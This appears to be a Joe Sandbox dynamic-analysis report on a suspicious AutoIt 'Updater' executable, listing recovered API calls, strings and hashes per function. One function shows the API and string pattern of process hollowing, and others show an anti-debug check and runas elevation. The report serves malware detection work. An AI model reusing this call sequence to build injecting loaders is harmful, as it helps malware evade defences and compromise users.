GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 013F2BD8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2BF6
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2C14
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 013F2C32
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,013F2CC1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 013F2C7B
RegQueryValueExA.ADVAPI32(?,013F2E3D,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,013F2CC1,?,80000001), ref: 013F2C99
RegCloseKey.ADVAPI32(?,013F2CC8,00000000,00000000,00000005,00000000,013F2CC1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2CBB
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 013F2CD8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 013F2CE5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 013F2CEB
lstrlen.KERNEL32(00000000), ref: 013F2D16
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 013F2D6B
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2D7B
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 013F2DA7
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DB7
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DE1
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DF1

Strings

Software\Borland\Locales, xrefs: 013F2BEC, 013F2C0A
Software\Borland\Delphi\Locales, xrefs: 013F2C28

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: a9291703ae9773d8253386cdd9f7825a62a50a346ebf5e7712d32277e47c0149
Instruction ID: 2fc730ff710963833402fe84a29c807764975135b2b9e6b668c1eed81633530e
Opcode Fuzzy Hash: a9291703ae9773d8253386cdd9f7825a62a50a346ebf5e7712d32277e47c0149
Instruction Fuzzy Hash: 15615F71A0424EBEEB51DAE8CC89FEFB7FC9B18708F404465B654E61C1D6B8DA448B60

Function 00B3310D Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 220
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00B3313C

Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F

GetCurrentProcess.KERNEL32(?,00BBD9B8,00000000,?,?), ref: 00B33253
IsWow64Process.KERNEL32(00000000,?,?), ref: 00B3325A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00B33285
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B33297
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00B332A5
FreeLibrary.KERNEL32(00000000,?,?), ref: 00B332AC
GetSystemInfo.KERNEL32(?,?,?), ref: 00B332D3

Strings

GetNativeSystemInfo, xrefs: 00B33291
kernel32.dll, xrefs: 00B33280

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3290436268-192647395
Opcode ID: bfde6f050050f0ad9f5999fb6e1a145563caf47575630fd15ccff35726fe71b4
Instruction ID: 708a04cc83bb235592c2c7be3e6a013e3f56a2ef511f965eeb4e19ae83c04aa4
Opcode Fuzzy Hash: bfde6f050050f0ad9f5999fb6e1a145563caf47575630fd15ccff35726fe71b4
Instruction Fuzzy Hash: 289180A294E3D5DFCB16C7787C815FA7FE5AB26700B1888D9D0849B221DE2C4508DB2A

Function 00B32D33 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B32D63
IsDebuggerPresent.KERNEL32 ref: 00B32D76
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00B32DE2

Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F

Part of subcall function 00B2A65C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B2A69D

SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 00B32E63
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B77988
SetCurrentDirectoryW.KERNEL32(?), ref: 00B779C9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BE1E24), ref: 00B77A52
ShellExecuteW.SHELL32(00000000), ref: 00B77A59

Part of subcall function 00B32C51: GetSysColorBrush.USER32(0000000F), ref: 00B32C5C
Part of subcall function 00B32C51: LoadCursorW.USER32(00000000,00007F00), ref: 00B32C6B
Part of subcall function 00B32C51: LoadIconW.USER32(00000063), ref: 00B32C81
Part of subcall function 00B32C51: LoadIconW.USER32(000000A4), ref: 00B32C93
Part of subcall function 00B32C51: LoadIconW.USER32(000000A2), ref: 00B32CA5
Part of subcall function 00B32C51: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B32CBD
Part of subcall function 00B32C51: RegisterClassExW.USER32(?), ref: 00B32D0E

Part of subcall function 00B3FBB7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B3FBE5
Part of subcall function 00B3FBB7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B3FC06
Part of subcall function 00B3FBB7: ShowWindow.USER32(00000000), ref: 00B3FC1A
Part of subcall function 00B3FBB7: ShowWindow.USER32(00000000), ref: 00B3FC23

Part of subcall function 00B334C7: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B33598

Strings

AutoIt, xrefs: 00B7797D
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B77982
runas, xrefs: 00B77A4D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 690ead279c0d7bece79e4cd8a7a4d088da04dfef999f0d547818804e91e43933
Instruction ID: 4734f8aed623c0dfa9db31a5ec7e91fc0babde910f11b9b922af51414cb5e718
Opcode Fuzzy Hash: 690ead279c0d7bece79e4cd8a7a4d088da04dfef999f0d547818804e91e43933
Instruction Fuzzy Hash: D7511071148385AFC701EF64EC429BE7BF8EB94B40F1009F9F585432A2DF68894AD766

Function 013F2CC7 Relevance: 15.1, APIs: 10, Instructions: 102
stringlibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 013F2CD8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 013F2CE5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 013F2CEB
lstrlen.KERNEL32(00000000), ref: 013F2D16
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 013F2D6B
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2D7B
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 013F2DA7
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DB7
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DE1
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 013F2DF1

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID:
API String ID: 1599918012-0
Opcode ID: b30b88bd219cbaf4d9da21ce8602e9a1d9637ed92d71513b3b0053543624a1ba
Instruction ID: ac0981a4c2d904a20d8e686eca71a13def1246889eeb1efb1367db82ad9e4c2f
Opcode Fuzzy Hash: b30b88bd219cbaf4d9da21ce8602e9a1d9637ed92d71513b3b0053543624a1ba
Instruction Fuzzy Hash: E6313D71E0421EAEEB51DAECC888BEFB7FD9F58304F0041A5B259E21C1D6B8DA458B10

Function 00B33AD9 Relevance: 7.9, APIs: 5, Instructions: 373COMMON

Download Yara Rule

APIs

Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B

DefDlgProcW.USER32(?,?,?,?,?), ref: 00B34273
GetSysColor.USER32(0000000F), ref: 00B342C5
SetBkColor.GDI32(?,00000000), ref: 00B342D8

Part of subcall function 00B33AE2: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B33B2A

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 12672744e1c08f37dbc3be3351fbea8167a1bbf18860fe1318e716ee63439742
Instruction ID: 3d5b88f5daaba998cd6e946ab0a2bafc34824f41f63bf02f72cddebf2ff049d4
Opcode Fuzzy Hash: 12672744e1c08f37dbc3be3351fbea8167a1bbf18860fe1318e716ee63439742
Instruction Fuzzy Hash: 74A1F270154504BFE728AA288C9CEBB3ADDEB46340F3582D9F516E72A1CF65FD01C661

Function 013F50B5 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 013F50D0
FindClose.KERNEL32(00000000,00000000,?), ref: 013F50DB
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 013F50F4
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 013F5105

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: FileTime$Find$CloseDateFirstLocal
String ID:
API String ID: 2659516521-0
Opcode ID: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
Instruction ID: 992efa4242697c48625a15e3d01931530663b45acc5cafc97a8e40066e3ea85b
Opcode Fuzzy Hash: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
Instruction Fuzzy Hash: 8FF0B272D0020DB6DF51EAED8D859CFB7AC6B09218F500796E629E3191EB34DB488B51

Function 00B27070 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00B672FB

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: e99243ad0c21d30d34665a4716b73d47e2161d133df54ed71246a91a2a2ba81b
Instruction ID: f1e5f0750c5ddfb2335dc71ee450ffc038cafef5dcf73dc071bd3109745bd2e0
Opcode Fuzzy Hash: e99243ad0c21d30d34665a4716b73d47e2161d133df54ed71246a91a2a2ba81b
Instruction Fuzzy Hash: 8E327C70948228DBCF14DF94E894AEDB7F4FF15308F1440D9E80AAB291DB799E46CB64

Function 01403EA7 Relevance: 1.5, APIs: 1, Instructions: 3libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01403EAB

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
Instruction ID: be68be7296445d1d8c9efe5ed17a0ddc0ed5e3a0c0ce8a40cfea562a1559ef80
Opcode Fuzzy Hash: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
Instruction Fuzzy Hash: 24A00231445A80DBDE11DB10CB49B09B761FBC0F01F108E64A0464781457785800D941

Function 00B351FB Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 283
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B352D2
GetSystemMetrics.USER32(00000007), ref: 00B352DA
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B35305
GetSystemMetrics.USER32(00000008), ref: 00B3530D
GetSystemMetrics.USER32(00000004), ref: 00B35332
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B3534F
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B3535F
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B35392
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B353A6
GetClientRect.USER32(00000000,000000FF), ref: 00B353C4
GetStockObject.GDI32(00000011), ref: 00B353E0
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B353EB

Part of subcall function 00B34B74: GetCursorPos.USER32(?), ref: 00B34B88
Part of subcall function 00B34B74: ScreenToClient.USER32(00000000,?), ref: 00B34BA5
Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000001), ref: 00B34BCE
Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000002), ref: 00B34BE8

SetTimer.USER32(00000000,00000000,00000028,00B33AA8), ref: 00B35412

Strings

AutoIt v3 GUI, xrefs: 00B3538A

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: bd824ebc359c5fd60f9743d8ced41e0407bedab20a3b33bae400afbc671a9af2
Instruction ID: 3959b84573275eef0fbf395da382621a585a9ea19d73de7aa97ab791f6cd06bb
Opcode Fuzzy Hash: bd824ebc359c5fd60f9743d8ced41e0407bedab20a3b33bae400afbc671a9af2
Instruction Fuzzy Hash: CEB1507564020A9FDB24DFA8DC89BAE3BF5FB48710F104269FA19A72D0DB74A840CB51

Function 00B2A76B Relevance: 27.0, APIs: 12, Strings: 3, Instructions: 702windowsleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B2AA28
TranslateMessage.USER32(?), ref: 00B2AB77
DispatchMessageW.USER32(?), ref: 00B2AB85
Sleep.KERNEL32(0000000A,?,?), ref: 00B2AB8F

Strings

@GUI_CTRLHANDLE, xrefs: 00B699EF
@GUI_WINHANDLE, xrefs: 00B69991
@GUI_CTRLID, xrefs: 00B6992F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Message$DispatchSleepTimeTranslatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
API String ID: 1406140084-758534266
Opcode ID: fd0447601d72daa8d112e03aefe63104c0f1a4fa7cfa8686c578bbdf8bc87765
Instruction ID: 9570fdfa566dd591b6e9e5c13656f9ca8b8507e2c572717e7eda31ceb1f32f00
Opcode Fuzzy Hash: fd0447601d72daa8d112e03aefe63104c0f1a4fa7cfa8686c578bbdf8bc87765
Instruction Fuzzy Hash: F0521F70608342DFDB24DF20D885BBAB7E4FF81304F1445ADE59A9B291DB74A984CB93

Function 01408639 Relevance: 25.0, APIs: 6, Strings: 8, Instructions: 464
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58), ref: 0140873E
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01408762
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58), ref: 01408795
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014087B5
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014087E7

Part of subcall function 0140430D: GetTickCount.KERNEL32 ref: 01404386

Part of subcall function 014070D1: MessageBoxA.USER32(00000000,00000000,01407131,00040040), ref: 01407104

GetTickCount.KERNEL32 ref: 01408C20

Strings

NtGetContextThread, xrefs: 0140883B
NtTerminateProcess, xrefs: 01408A8B, 01408B22, 01408C16
NtUnmapViewOfSection, xrefs: 01408897
NtResumeThread, xrefs: 01408A3D
D, xrefs: 014086EE
execution failure, try to assign other file path, xrefs: 01408ADA, 01408B70
NtSetContextThread, xrefs: 014089E6
NtFreeVirtualMemory, xrefs: 01408BE0

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: CreateProcess$CountTick$Message
String ID: execution failure, try to assign other file path$D$NtFreeVirtualMemory$NtGetContextThread$NtResumeThread$NtSetContextThread$NtTerminateProcess$NtUnmapViewOfSection
API String ID: 2713535555-1661097759
Opcode ID: 09b8db2fc57209297c8fd90c486d13001622533dd64e5f5e280ce2b1c31ab6b7
Instruction ID: 334633ee54c81e976863d1fa95f8335b1ba187097256eda0765b44cba3c618b5
Opcode Fuzzy Hash: 09b8db2fc57209297c8fd90c486d13001622533dd64e5f5e280ce2b1c31ab6b7
Instruction Fuzzy Hash: 48120D70E0021AAFDB51DBAACD81FDEBBF4AB18704F1440AAE644E72D1D770A9448F61

Function 00B3507A Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B350AD
RegisterClassExW.USER32(00000030), ref: 00B350D7
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B350E8
InitCommonControlsEx.COMCTL32(?), ref: 00B35105
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B35115
LoadIconW.USER32(000000A9), ref: 00B3512B
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B3513A

Strings

AutoIt v3 GUI, xrefs: 00B350C9
+, xrefs: 00B35096
0, xrefs: 00B3508F
TaskbarCreated, xrefs: 00B350DD

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 96dd8fd50cf7716fa89d0341a390209edb4aec02518c1872ab09b58831cde89d
Instruction ID: d61935f6afe6b972d457cbf4b75f5422612e5078ca56f1abccd67b8c06259a16
Opcode Fuzzy Hash: 96dd8fd50cf7716fa89d0341a390209edb4aec02518c1872ab09b58831cde89d
Instruction Fuzzy Hash: DD21B4B5901218AFDB00DFA4EC89AEDBBF4FB08710F10425AF611A72A0EBB94544CF95

Function 013F0329 Relevance: 18.2, APIs: 9, Strings: 3, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CharNextA.USER32(00000000), ref: 013F037E
CharNextA.USER32(00000000,00000000), ref: 013F038A
CharNextA.USER32(00000000,00000000), ref: 013F03B2
CharNextA.USER32(00000000), ref: 013F03BE
CharNextA.USER32(?,00000000), ref: 013F03FF
CharNextA.USER32(00000000,?,00000000), ref: 013F040B
CharNextA.USER32(00000000,?,00000000), ref: 013F0443
CharNextA.USER32(?,00000000), ref: 013F044F

Strings

", xrefs: 013F03A3
", xrefs: 013F0434
, xrefs: 013F0351

Memory Dump Source

Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd

Similarity

API ID: CharNext
String ID: $"$"
API String ID: 3213498283-938660540
Opcode ID: a74b84504903bc6848e67ef457c7a6e515321d0edc5c07087f1d644512264336
Instruction ID: f879c365005c086628c34a5fd23e3d5576f726b61d1e3f6422efab8956554099
Opcode Fuzzy Hash: a74b84504903bc6848e67ef457c7a6e515321d0edc5c07087f1d644512264336
Instruction Fuzzy Hash: 0351E770A05286DFD325DFADC484A1ABBE6EF19354B64089EF6C5CB352D730A840DF51

Function 00B60585 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B602C4: CreateFileW.KERNELBASE(00000000,00000000,?,00B6062E,?,?,00000000,?,00B6062E,00000000,0000000C), ref: 00B602E1

GetLastError.KERNEL32 ref: 00B60699
__dosmaperr.LIBCMT ref: 00B606A0
GetFileType.KERNELBASE(00000000), ref: 00B606AC
GetLastError.KERNEL32 ref: 00B606B6
__dosmaperr.LIBCMT ref: 00B606BF
CloseHandle.KERNEL32(00000000), ref: 00B606DF
CloseHandle.KERNEL32(?), ref: 00B60829
GetLastError.KERNEL32 ref: 00B6085B
__dosmaperr.LIBCMT ref: 00B60862

Strings

H, xrefs: 00B607E7

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 410f27f7e20b1f2a5ce36bec7d5ab985a65c07de0cce0e0a68e321972adaba67
